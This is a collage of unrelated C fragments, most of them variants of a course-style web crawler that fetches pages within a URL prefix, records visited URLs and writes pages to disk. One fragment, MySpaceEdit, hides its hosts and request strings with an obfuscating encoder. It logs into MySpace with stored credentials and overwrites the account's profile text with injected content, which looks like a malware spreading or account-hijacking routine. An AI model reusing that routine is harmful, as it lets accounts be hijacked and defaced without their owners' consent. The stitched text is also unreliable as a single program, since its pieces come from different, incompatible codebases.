/* * TryGetWebPage - calls regular GetWebPage multiple times to retreive pages * when curl does not work the first time * * Returns 0 if the web page is not retreived after MAX_TRY attempts or * 1 if the page is successfully curled * */ int TryGetWebPage(WebPage* page) { if (GetWebPage(page) == 1) { sleep(INTERVAL_PER_FETCH); return 1; } else { for (int i = 1; i < MAX_TRY; i++) { sleep(INTERVAL_PER_FETCH); if (GetWebPage(page) == 1) return 1; } printf("Couldn't retreive the page of %s. " "Skipping this page and crawling the next page.", page->url); return 0; } }
int MySpaceEdit (struct myspace_d *myspace) { char buf[0x15F90],lpRequest[0x800],tmp[0x800]; GetWebPage(buf,sizeof(buf),riddle_enc("���=|��prt=r~|"), riddle_enc("rwmn�7lov"),riddle_enc("JHW"),"",0x0); // www.myspace.com, index.cfm, GET LogToFile("tmp.html",buf,"w"); sprintf(lpRequest, "__VIEWSTATE=%s&" "ctl00$Main$SplashDisplay$ctl00$Email_Textbox=%s&" "ctl00$Main$SplashDisplay$ctl00$Password_Textbox=%s", GetHashValue(buf,"__VIEWSTATE",'"',0x25),myspace->username,myspace->password); GetWebPage(buf,sizeof(buf),riddle_enc("�wu��w@���suw@u�"), riddle_enc("�����P���a����������_�����P�������"),riddle_enc("TSWX"),lpRequest,0x0); // secure.myspace.com, index.cfm?fuseaction=login.process, POST LogToFile("afterlogin.html",buf,"w"); if(strstr(buf,riddle_enc("z��An���Ac�Am�����Nj�A��A��Au���B"))) return(0x0); // You Must Be Logged-In to do That! strcpy(myspace->url,GetHashValue(buf,riddle_enc("���}��||{��E����xz|Ez��"),'"',0x18)); // profileedit.myspace.com GetWebPage(buf,sizeof(buf),riddle_enc("���}��||{��E����xz|Ez��"), myspace->url,riddle_enc("JHW"),"",0x0); // profileedit.myspace.com, GET sprintf(lpRequest, "__EVENTTARGET=&__EVENTARGUMENT=&" "__VIEWSTATE=%s&ctl00$ctl00$cpMain$ProfileEditContent$editInterests$hash=%s&" "ctl00$ctl00$cpMain$ProfileEditContent$editInterests$SaveTop=Save All Changes&" "ctl00$ctl00$cpMain$ProfileEditContent$editInterests$AboutMeTextBox=%s", GetHashValue(buf,"__VIEWSTATE",'"',0x25),GetHashValue(buf,"_hash",'"',0xE),myspace->editdata); strcpy(tmp,lpRequest); GetWebPage(buf,sizeof(buf),riddle_enc("���}��||{��E����xz|Ez��"), myspace->url,riddle_enc("JHW"),"",0x0); // profileedit.myspace.com, GET GetWebPage(buf,sizeof(buf),riddle_enc("���}��||{��E����xz|Ez��"), GetHashValue(buf,"name=\"aspnetForm\"",'"',0x29),riddle_enc("TSWX"),tmp,0x1); // profileedit.myspace.com, POST GetWebPage(NULL,0x0,"collect.myspace.com","index.cfm?fuseaction=signout","GET","",0x1); LogToFile("logoff.html",buf,"w"); return(0x1); }
void CrawlPage(WebPage webpage){ char* nexturl= NULL; int lastpos = 0; int depth = webpage.depth + 1; if(depth > maxWebPageDepth) return; printf("\n\n[crawler]: Crawling - %s\n\n",webpage.url); while((lastpos = GetNextURL(webpage.html, lastpos, webpage.url, &nexturl))>0){ NormalizeURL(nexturl); if(!CheckURL(nexturl)){ // setup new page struct WebPage* newwebpage = (WebPage*)calloc(1,sizeof(WebPage)); newwebpage->url = (char*)calloc(strlen(nexturl)+1, sizeof(char)); strcpy(newwebpage->url,nexturl); newwebpage->depth = depth; // get new webpage if(GetWebPage(newwebpage)){ if(HashTableInsert(nexturl)){ // If not found in hash table, add to hash table printf("[crawler]: Parser found new link - %s\n",nexturl); struct ListNode* listentry = (ListNode*)calloc(1,sizeof(ListNode)); listentry->page = newwebpage; // then add to list WebPageList->tail = InsertNode(WebPageList->tail,listentry); WriteFile(*newwebpage, filenum++); // then write file } else{ CleanUpPage(newwebpage); } } } free(nexturl); nexturl = NULL; // Sleep for a second sleep(INTERVAL_PER_FETCH); } }
int main(int argc, char* argv[]) { //Check for the number of arguments if(argc != 4){ printf("Invalid Input Argument\n"); printHelp(); exit(1); } //direcotry file path int dirSize = strlen(argv[2]); char dir[dirSize + 1]; dir[0] = '\0'; strcat(dir, argv[2]); int urlSize = strlen(argv[1]); char inputURL[urlSize + 1]; inputURL[0] = '\0'; strcat(inputURL, argv[1]); //Get the max depth number. int inputDepth = atoi(argv[3]); //Check if correct depth is provided. if(inputDepth > 4 || inputDepth < 0){ printf("Invalid [depth]\n"); printHelp(); exit(1); } //Check for URL validity if(!strstr(inputURL,URL_PREFIX)){ printf("Invalid input [seed url]\n"); printHelp(); exit(1); } //checkf for directory location validity DIR* directory = opendir(dir); if(directory){ closedir(directory); } else if(ENOENT == errno){ printf("Directory does not exist\n"); printHelp(); exit(1); } else{ printf("Directory can't be opened\n"); printHelp(); exit(1); } // init curl curl_global_init(CURL_GLOBAL_ALL); // setup seed page WebPage* seedWebPage = calloc(1, sizeof(WebPage));//Memory allocation for seed webpage seedWebPage->url = calloc((strlen(inputURL) + 1), sizeof(char));//Memory allocation to the seedURL seedWebPage->url[0] = '\0'; strcat(seedWebPage->url, inputURL); seedWebPage->depth = 0; seedWebPage->html = NULL; //Initialize data structures HashTable* visitedURLHash = initHashTable(); List* webPageList = initializeList(); webPageList->head->page = seedWebPage; //get seed webpage. if(GetWebPage(seedWebPage)){ // write seed file FILE *fPointer; char* pathVar1 = pathToDirectory(dir, fileNumber); fPointer = fopen(pathVar1, "w"); free(pathVar1); writeHTMLtoFile(fPointer, seedWebPage); //free(fPointer); if(inputDepth == 0){ curl_global_cleanup(); free(seedWebPage->html); free(seedWebPage->url); free(seedWebPage); //free webPageList and hashtable free(webPageList); for(int i = 0; i < MAX_HASH_SLOT; i++){ free(visitedURLHash->table[i]->url); free(visitedURLHash->table[i]); } free(visitedURLHash); return 0; } fileNumber += 1; depth += 1; HashTableInsert(visitedURLHash, seedWebPage->url); //mark as visited // extract urls from seed page char * result; int pos = 0; while((pos = GetNextURL(seedWebPage->html, pos, seedWebPage->url, &result))>0){ if(NormalizeURL(result) && strstr(result,URL_PREFIX)){ strtok(result, "#"); //If not in hashtable, add it to the hashtable and add it to the webPageList. if(HashTableLookup(visitedURLHash, result) == 0){ HashTableInsert(visitedURLHash, result); AppendList(webPageList, webPageInit(result, depth)); free(result); } } } if(webPageList->head->next->next == NULL){ //seed redirect case webPageList->head->next->page->depth = 0; fileNumber = 1; } tempWebPage = PopList(webPageList); // Get rid of visited seedPage } else{ curl_global_cleanup(); tempWebPage = PopList(webPageList); free(seedWebPage->html); free(seedWebPage->url); free(seedWebPage); //free(tempWebPage); free(webPageList); for(int i = 0; i < MAX_HASH_SLOT; i++){ free(visitedURLHash->table[i]->url); free(visitedURLHash->table[i]); } free(visitedURLHash); exit(1); } //while there are urls to crawl while(webPageList->head != NULL && webPageList->tail != NULL){ // get webpage for url tempWebPage = PopList(webPageList); if(GetWebPage(tempWebPage)){ // write page file char* pathVar = pathToDirectory(dir, fileNumber); FILE *fPointer = fopen(pathVar, "w"); free(pathVar); printf("Found link: %s\n",tempWebPage->url); writeHTMLtoFile(fPointer, tempWebPage); fileNumber += 1; if((tempWebPage->depth + 1) <= inputDepth ){ char * resultTemp; int posTemp = 0; while((posTemp = GetNextURL(tempWebPage->html, posTemp, tempWebPage->url, &resultTemp))>0){ if( NormalizeURL(resultTemp) && strstr(resultTemp,URL_PREFIX) ){ strtok(resultTemp, "#"); //insert to the hashtable and the webPageList if not already present if(HashTableLookup(visitedURLHash, resultTemp) == 0){ HashTableInsert(visitedURLHash, resultTemp); AppendList(webPageList, webPageInit(resultTemp, tempWebPage->depth+1)); } } free(resultTemp); } } free(tempWebPage->url); free(tempWebPage->html); free(tempWebPage); } else{ free(tempWebPage->url); free(tempWebPage->html); free(tempWebPage); } sleep(INTERVAL_PER_FETCH); } // cleanup curl curl_global_cleanup(); free(seedWebPage->url); free(seedWebPage->html); free(seedWebPage); free(webPageList); //free the hashtable for(int i = 0; i < MAX_HASH_SLOT; i++){ if(visitedURLHash->table[i]->url != NULL){ HashTableNode* currNode = visitedURLHash->table[i]; while(currNode->next != NULL){ HashTableNode* tempNode = currNode; currNode = currNode->next; free(tempNode->url); free(tempNode); } free(currNode->url); free(currNode); } else{ free(visitedURLHash->table[i]); } } free(visitedURLHash); return 0; }
/* ========================================================================== */ int main(int argc, char* argv[]) { int filenum=1; int initdepth=1; // check command line arguments if (argcheck(argc,argv) == 1){ exit(1); } char *starturl = argv[1]; char *targetdir = argv[2]; int depth = atoi(argv[3]); //initialize our hashtables and url list HashTable *myhashtable; List *mylist; myhashtable=initializeHashTable(); mylist=initializelist(); // init curl curl_global_init(CURL_GLOBAL_ALL); // setup seed page WebPage *startpage = createWebPage(starturl,0); // get seed webpage. If the url is invalid, quit and send an error message. if ( GetWebPage(startpage) == 0 ){ printf("The url that you entered was invalid. Please try again."); free(startpage->html); free(startpage); exit(1); } // write seed file createfile(startpage,targetdir,filenum); filenum++; // add seed page to hashtable insertHashTable(myhashtable,startpage->url); // extract urls from seed page if( depth > 0 ){ parseHTML(startpage,mylist,myhashtable,initdepth); } // while there are urls to crawl while ( mylist->head != NULL ){ // get next url from list WebPage *nextpage = listpop(mylist); int currdepth = nextpage->depth; // get webpage for url // If the url is invalid, quit and free the memory if (GetWebPage(nextpage) != 0 ){ createfile(nextpage,targetdir,filenum); filenum++; // extract urls from webpage if ( currdepth < depth ){ parseHTML(nextpage, mylist, myhashtable, currdepth+1); } } free(nextpage->html); free(nextpage->url); free(nextpage); sleep(SLEEPTIME); } // cleanup curl free(startpage->html); free(startpage); freeHashTable(myhashtable); freelist(mylist); curl_global_cleanup(); return 0; }
int main(int argc, char* argv[]) { // check command line arguments // Check that there are three input parameters. if (argc != 4) { printf("Please input three parameters: seed URL, directory, and max depth.\n"); return 1; } // Check that the seed url has proper domain (old-www). if (strncmp(argv[1], URL_PREFIX, 15) != 0) { printf("The seed URL domain must be old-www.\n"); return 1; } // Check that the directory already exists. struct stat st; if (stat(argv[2], &st) == 0 && S_ISDIR(st.st_mode)); else { // If the directory does not exist, terminate the program. printf("The directory %s cannot be found. Please enter an existing directory.\n", argv[2]); return 1; } // Check that the directory path does not have a '/' at the end for ease in writing filenames. if (argv[2][strlen(argv[2]) - 1] == '/') { printf("Please do not add '/' at the end of the directory path.\n"); return 1; } // Check the third argument. // Loop through each letter of the first argument and check that it is indeed a number. for (int i = 0; i < strlen(argv[3]); i++) { if (!isdigit((int)argv[3][i])) { printf("Please input a valid number for the depth.\n"); return 1; } } sscanf(argv[3], "%d", &depth); // Store the argument as an integer. // Check that the depth specified does not exceed max depth. if (depth > MAX) { printf("Search depth cannot exceed MAX depth of 4. Please enter a valid depth.\n"); return 1; } // init curl curl_global_init(CURL_GLOBAL_ALL); // setup seed page WebPage *page = calloc(1, sizeof(WebPage)); page->url = (char *)malloc(strlen(argv[1]) + 1); MALLOC_CHECK(stderr, page->url); // Check that memory was allocated. strcpy(page->url, argv[1]); // Copy the seed url to page->url. // get seed webpage if (!GetWebPage(page)) { printf("The seed URL is invald. Please enter a valid seed URL.\n"); FreeWebMemory(page); return 1; } // Normalize the seed url. if (!NormalizeURL(page->url)) { printf("Seed URL cannot be normalized.\n"); FreeWebMemory(page); return 1; } // write seed file strcpy(path, argv[2]); // Let var path contain the directory path. WriteFile(page, path, pageID); // add seed page to hashtable if (!AddToHashTable(page->url)) { FreeWebMemory(page); return 1; } // Initialize URLList. if (!InitList()) { FreeWebMemory(page); return 1; } // extract urls from seed page if (!CrawlPage(page)) { FreeHashTable(); // Free all memory dynamically allocated to the hash table. FreeWebMemory(page); return 1; } // while there are urls to crawl while (URLList.tail != NULL) { // get next webpage from list WebPage *next = PopList(); // write page file pageID++; if (!WriteFile(next, argv[2], pageID)) { // Check that the WriteFile worked. FreeWebMemory(next); return 1; } // extract urls from webpage and then cleanup. CrawlPage(next); FreeWebMemory(next); } // Memory cleanup. FreeHashTable(); // Free memory dynamically allocated to the hash table. FreeWebMemory(page); // Free memory dynamically allocated to the Webpage variable. // cleanup curl curl_global_cleanup(); return 0; }
// Function to crawl a given webpage for links. int CrawlPage(WebPage *wp) { char *result; // variable to hold the url. int pos = 0; // position in each html page. WebPage *newPage; // New webpage. // Check that the depth does not exceed the depth passed. if (wp->depth >= depth) { return 0; } printf("\n"); printf("[crawler]: Crawling - %s\n", wp->url); // Print the url being curled. printf("\n"); // Loop through each html page to get all its urls. while ((pos = GetNextURL(wp->html, pos, wp->url, &result)) >= 0) { // Check that the url has proper domain (old-www). if (strncmp(result, URL_PREFIX, strlen(URL_PREFIX)) != 0) { free(result); continue; } // Normalize the url. if (!NormalizeURL(result)) { free(result); continue; } // Check that the url isn't already in the hash table. if (!InHashTable(result)) { AddToHashTable(result); // Add the url to the hash table. // Setup new page for each url. newPage = calloc(1, sizeof(WebPage)); newPage->depth = wp->depth + 1; newPage->url = (char *)malloc(strlen(result) + 1); if (!newPage->url) { // Check that memory was allocated. continue; } strcpy(newPage->url, result); // Get html for each url. if (!GetWebPage(newPage)) { FreeWebMemory(newPage); free(result); continue; } printf("[crawler]: Parser found link - %s\n", result); // Add to the list of webpages to be visited. if (!AppendList(newPage)) { free(result); return 0; } } free(result); } return 1; }
// main crawler function int main(int argc, char* argv[]) { // local variables FILE *fp; // file pointer for html files char *nextURL; // pointer to the next URL found on the seed page char *newURL; // pointer to the next URL in the while loop // check command line arguments if (argc != 4) { printf("Incorrect number of arguments provided."); exit(1); } // check that the second argument is a directory stat(argv[2],&statbuffer); if S_ISDIR(statbuffer.st_mode) { } else { printf("Error, you did not supply a valid directory"); exit(1); } // get arguments char *seedURL = argv[1]; int filename_len = strlen(argv[2])+21; // get the directory char*filename = calloc(filename_len,sizeof(char)); // check the maxDepth int value = is_numeric(argv[3]); if (value != 0) { sscanf(argv[3],"%i",&maxDepth); } else { printf("Error! maxDepth must be a number"); exit(1); } // init curl curl_global_init(CURL_GLOBAL_ALL); // initialize data structures/variables // initialize hashtable HashTable *table = malloc(sizeof(HashTable)); memset(table,0,MAX_HASH_SLOT); // initialize linked list List *WebPageList; WebPageList = createList(); // setup seed page // get seed webpage // if it fails, report and exit if (NormalizeURL(seedURL) == 0) { printf("Error, bad URL"); exit(1); } // write seed file // create WebPage object by allocating memory WebPage *seedPage = malloc(sizeof(WebPage)); // assign values to each part of the struct seedPage->url = seedURL; seedPage->html = NULL; seedPage->html_len = 0; seedPage->depth = 0; // try to get the webpage up to MAX_TRY times if (!GetWebPage(seedPage)) { for (tries = 0; tries < MAX_TRY; tries++) { if (GetWebPage(seedPage)) { break; } } } // write html contents to a file "1" in the given directory sprintf(filename,"%s/%d",argv[2],1); fp = fopen(filename,"w"); fputs(seedURL,fp); fputs("\n",fp); fprintf(fp,"%d\n",seedPage->depth); fputs(seedPage->html,fp); // close the file and wipe the filename fclose(fp); memset(filename,'\0',filename_len); // add seed page to hashtable add(table,seedURL); // extract urls from seed page // while there are still URLs in the seed page's html while ((pos = GetNextURL(seedPage->html,pos,seedPage->url,&nextURL)) > 0) { // only visiting them if it wouldn't exceed maxDepth if ((seedPage->depth+1) > maxDepth) { free(seedPage); exit(1); } // ensure it's a valid url if (NormalizeURL(nextURL) != 0) { // also check if its in the right domain if (strncmp(URL_PREFIX,nextURL,strlen(URL_PREFIX)) == 0) { // if it is added to the hashtable it is a unique URL that // hasn't been visited before, add it to the linked list // of URLs to visit if (add(table,nextURL)) { // create a new webpage object WebPage *pages = malloc(sizeof(WebPage)); pages->url = nextURL; pages->html = NULL; pages->html_len = 0; pages->depth = 1; // try to get the webpage up until the MAX_TRY tries = 0; if (!GetWebPage(pages)) { for (tries = 0; tries < MAX_TRY; tries++) { if (GetWebPage(pages)) { break; } } } // add it to the linked list addToEnd(WebPageList,pages); } } } } // while there are urls to crawl while (WebPageList->head != NULL) { // get next url from list WebPage *nextPage = malloc(sizeof(WebPage)); nextPage = removeFromFront(WebPageList); // try to get the webpage up until the MAX_TRY tries = 0; if (!GetWebPage(nextPage)) { for (tries = 0; tries < MAX_TRY; tries++) { if (GetWebPage(nextPage)) { break; } } } // write page file sprintf(filename,"%s/%d",argv[2],docNum); fp = fopen(filename,"w"); fputs(nextPage->url,fp); fputs("\n",fp); fprintf(fp,"%d\n",nextPage->depth); fputs(nextPage->html,fp); // close the file and wipe the filename (to be used next time) fclose(fp); memset(filename,'\0',filename_len); // increment the doc num docNum++; // check if visiting the URLs on this page will exceed maxDepth if ((nextPage->depth+1) > maxDepth) { free(nextPage); continue; } pos = 0; // iterate through all the URLs on the page while ((pos = GetNextURL(nextPage->html,pos,nextPage->url,&newURL))>0) { // check to ensure that the URLs are the proper format if (NormalizeURL(newURL) != 0 ) { // check to ensure that they are in the right domain if (strncmp(URL_PREFIX,newURL,strlen(URL_PREFIX)) == 0) { // making sure to only add new ones to the list if (add(table,newURL) != 0) { // create a new WebPage object WebPage *page = malloc(sizeof(WebPage)); page->url = newURL; page->html = NULL; page->html_len = 0; page->depth = nextPage->depth + 1; GetWebPage(page); // try to get the webpage up until the MAX_TRY tries = 0; if (!GetWebPage(page)) { for (tries = 0; tries < MAX_TRY; tries++) { if (GetWebPage(page)) { break; } } } // add the page to the linked list addToEnd(WebPageList,page); } } } } // Sleep for a bit to avoid annoying the target sleep(INTERVAL_PER_FETCH); // Free resources free(nextPage); } // cleanup curl curl_global_cleanup(); // free resources // free hashtable hash = JenkinsHash(seedURL,MAX_HASH_SLOT); HashTableNode *freer = table->table[hash]; HashTableNode *tempHash = NULL; while (freer != NULL) { tempHash = freer; freer = freer->next; free(tempHash); } free(table); // free linked list free(WebPageList); // free WebPage and filename pointer free(seedPage); free(filename); return 0; }
int main(int argc, char* argv[]) { filenum = 1; // check command line arguments if(argc != 4){ // check number of arguments fprintf(stderr,"Error: Number of input argument needs to be exactly 3\n"); return -1; }else if (CheckDirectory(argv[2])){ // check if directory exist return -1; }else if(CheckDepth(argv[3])){ // check depth return -1; }else if(CheckURL(argv[1])){ // check url fprintf(stderr,"Error: Invalid URL. Can only crawl URL with URL prefix %s\n",URL_PREFIX); return -1; } // init curl curl_global_init(CURL_GLOBAL_ALL); // setup seed page seedPage = (WebPage*)calloc(1,sizeof(WebPage)); NormalizeURL(seedURL); seedPage->url = (char*)calloc(strlen(seedURL)+1,sizeof(char)); strcpy(seedPage->url,seedURL); seedPage->depth = 0; // get seed webpage if(!GetWebPage(seedPage)){ // clean up and exit if url is invalid fprintf(stderr,"Error: Invalid URL\n"); curl_global_cleanup(); return -1; } // write seed file WriteFile(*seedPage, filenum++); // Exit if maxWebPageDepth = 0 if(maxWebPageDepth == 0){ // clean up and exit if max webpage depth is 0 printf("\n[crawler]: Crawling - %s\n\n",seedPage->url); printf("1 page has been crawled \n\n"); CleanUpPage(seedPage); CleanUpHash(URLsVisited); curl_global_cleanup(); return 0; } // add seed page to hashtable InitialiseHashTable(URLsVisited); HashTableInsert(seedURL); // add seed node to list WebPageList = (List*)calloc(1,sizeof(List)); struct ListNode* seednode = (ListNode*)calloc(1,sizeof(ListNode)); seednode->page = seedPage; WebPageList->head = seednode; WebPageList->tail = seednode; // extract urls from seed page CrawlPage(*seedPage); WebPageList->head = RemoveNode(WebPageList->head); // while there are urls to crawl while(WebPageList->head != NULL && WebPageList->head->page->depth < maxWebPageDepth){ // get next url from list, get webpage for url, write page file and extract urls from webpage CrawlPage(*(WebPageList->head->page)); WebPageList->head = RemoveNode(WebPageList->head); } // cleanup memory CleanUpList(WebPageList); CleanUpHash(URLsVisited); // cleanup curl curl_global_cleanup(); printf("\n\n %d webpages have been crawled\n\n", filenum-1); return 0; }